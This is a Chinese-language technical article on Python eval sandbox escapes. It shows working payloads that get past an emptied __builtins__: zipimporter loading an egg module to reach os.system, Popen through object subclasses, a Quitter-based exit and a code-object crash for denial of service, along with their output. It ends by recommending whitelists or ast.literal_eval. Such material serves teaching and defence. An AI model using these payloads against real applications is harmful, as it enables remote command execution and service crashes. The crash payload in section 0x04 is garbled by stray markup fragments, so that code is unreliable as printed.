0x00 前言

---

eval是Python用於執行python表示式的一個內建函式，使用eval，可以很方便的將字串動態執行。比如下列程式碼：

#!python
>>> eval("1+2")
3
>>> eval("[x for x in range(10)]")
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]

當記憶體中的內建模組含有os的話，eval同樣可以做到命令執行：

#!python
>>> import os
>>> eval("os.system('whoami')")
win-20140812chj\administrator
0

當然，eval只能執行Python的表示式型別的程式碼，不能直接用它進行import操作，但exec可以。如果非要使用eval進行import，則使用__import__：

#!python
>>> exec('import os')
>>> eval('import os')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<string>", line 1
    import os
         ^
SyntaxError: invalid syntax
>>> eval("__import__('os').system('whoami')")
win-20140812chj\administrator
0

在實際的程式碼中，往往有使用客戶端資料帶入eval中執行的需求。比如動態模組的引入，舉個例子，一個線上爬蟲平臺上爬蟲可能有多個並且位於不同的模組中，伺服器端但往往只需要呼叫使用者在客戶端選擇的爬蟲型別，並透過後端的exec或者eval進行動態呼叫，後端編碼實現非常方便。但如果對使用者的請求處理不恰當，就會造成嚴重的安全漏洞。

0x01 “安全”使用eval

---

現在提倡最多的就是使用eval的後兩個引數來設定函式的白名單：

Eval函式的宣告為eval(expression[, globals[, locals]])

其中，第二三個引數分別指定能夠在eval中使用的函式等，如果不指定，預設為globals()和locals()函式中 包含的模組和函式。

#!python
>>> import os
>>> 'os' in globals()
True
>>> eval('os.system(\'whoami\')')
win-20140812chj\administrator
0
>>> eval('os.system(\'whoami\')',{},{})
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<string>", line 1, in <module>
NameError: name 'os' is not defined

如果指定只允許呼叫abs函式，可以使用下面的寫法：

#!python
>>> eval('abs(-20)',{'abs':abs},{'abs':abs})
20
>>> eval('os.system(\'whoami\')',{'abs':abs},{'abs':abs})
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<string>", line 1, in <module>
NameError: name 'os' is not defined
>>> eval('os.system(\'whoami\')')
win-20140812chj\administrator
0

使用這種方法來防護，確實可以起到一定的作用，但是，這種處理方法可能會被繞過，從而造成其他問題！

0x02 繞過執行程式碼1

---

被繞過的情景如下，小明知道了eval會帶來一定的安全風險，所以使用如下的手段去防止eval執行任意程式碼：

#!python
env = {}
env["locals"]   = None
env["globals"]  = None
env["__name__"] = None
env["__file__"] = None
env["__builtins__"] = None

eval(users_str, env)

Python中的__builtins__是內建模組，用來設定內建函式的模組。比如熟悉的abs，open等內建函式，都是在該模組中以字典的方式儲存的，下面兩種寫法是等價的：

#!python
>>> __builtins__.abs(-20)
20
>>> abs(-20)
20

我們也可以自定義內建函式，並像使用Python中的內建函式一樣使用它們：

#!python
>>> def hello():
...     print 'shabi'
>>> __builtin__.__dict__['say_hello'] = hello
>>> say_hello()
shabi

小明將eval函式的作用域中的內建模組設定為None，好像看起來很徹底了，但依然可以被繞過。__builtins__是__builtin__的一個引用，在__main__模組下，兩者是等價的：

#!python
>>> id(__builtins__)
3549136
>>> id(__builtin__)
3549136

根據烏雲drops提到的方法，使用如下程式碼即可：

#!python
[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")

上面的程式碼首先利用__class__和__subclasses__動態載入了object物件，這是因為eval中無法直接使用object。然後使用object的子類的zipimporter對egg壓縮檔案中的configobj模組進行匯入，並呼叫其內建模組中的os模組從而實現命令執行，當然，前提是要有configobj的egg檔案。 configobj模組很有意思，居然內建了os模組：

#!python
>>> "os" in configobj.__dict__
True
>>> import urllib
>>> "os" in urllib.__dict__
True
>>> import urllib2
>>> "os" in urllib2.__dict__
True
>>> configobj.os.system("whoami")
win-20140812chj\administrator
0

和configobj類似的模組如urllib，urllib2，setuptools等都有os的內建，理論上使用哪個都行。 如果無法下載egg壓縮檔案，可以下載帶有setup.py的資料夾，加入：

#!python
from setuptools import setup, find_packages  

然後執行:

#!bash
python setup.py bdist_egg

就可以在dist資料夾中找到對應的egg檔案。 繞過demo如下：

#!python
>>> env = {}
>>> env["locals"]   = None
>>> env["globals"]  = None
>>> env["__name__"] = None
>>> env["__file__"] = None
>>> env["__builtins__"] = None
>>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('E:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"
>>> eval(users_str, env)
win-20140812chj\administrator
0
>>> eval(users_str, {}, {})
win-20140812chj\administrator
0

0x03 拒絕服務攻擊1

---

object的子類中有很多有趣的東西，執行以下程式碼檢視：

#!python
[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]

這裡我就不輸出結果了，如果你執行的話，可以看到很多有趣的模組，比如file，zipimporter，Quitter等。經過測試，file的建構函式是被直譯器沙箱隔離的。 簡單的，或者直接使object暴露出的子類Quitter進行退出：

#!python
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__
 == 'Quitter'][0](0)()", {'__builtins__':None})

C:/>

如果運氣好，遇到對方程式中匯入了os等敏感模組，那麼Popen就可以用，並且繞過__builins__為空的限制，栗子如下：

#!python
>>> import subprocess
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0](['ping','-n','1','127.0.0.1'])",{'__builtins__':None})
<subprocess.Popen object at 0x0324FF70>
>>>
正在 Ping 127.0.0.1 具有 32 位元組的資料:
來自 127.0.0.1 的回覆: 位元組=32 時間<1ms TTL=64
127.0.0.1 的 Ping 統計資訊:
    資料包: 已傳送 = 1，已接收 = 1，丟失 = 0 (0% 丟失)，
往返行程的估計時間(以毫秒為單位):
    最短 = 0ms，最長 = 0ms，平均 = 0ms
>>>

事實上，這種情況非常多，比如匯入os模組，一般用來處理路徑問題。所以說，遇到這種情況，完全可以列舉大量的功能函式，來探測目標object的子類中是否含有一些危險的函式可以直接使用。

0x04 拒絕服務攻擊2

---

同樣，我們甚至可以繞過__builtins__為None，造成一次拒絕服務攻擊，Payload(來自老外blog)如下：

#!python
>>> eval('(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()', {"__builtins__":None})

執行上面的程式碼，Python直接crash掉了，造成拒絕服務攻擊。 原理是透過巢狀的lambda來構造一片程式碼段，即code物件。為這個code物件分配空的棧，並給出相應的程式碼字串，這裡是KABOOM，在空棧上執行程式碼，會出現crash。構造完成後，呼叫fc函式即可觸發，其思路不可謂不淫蕩。

0x05 總結

---

從上面的內容我們可以看出，單單將內建模組置為空，是不夠的，最好的機制是構造白名單，如果覺得比較麻煩，可以使用ast.literal_eval代替不安全的eval。

參考資料：

【1】http://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html

【2】/web/?id=7490

【3】http://stackoverflow.com/questions/3513292/python-make-eval-safe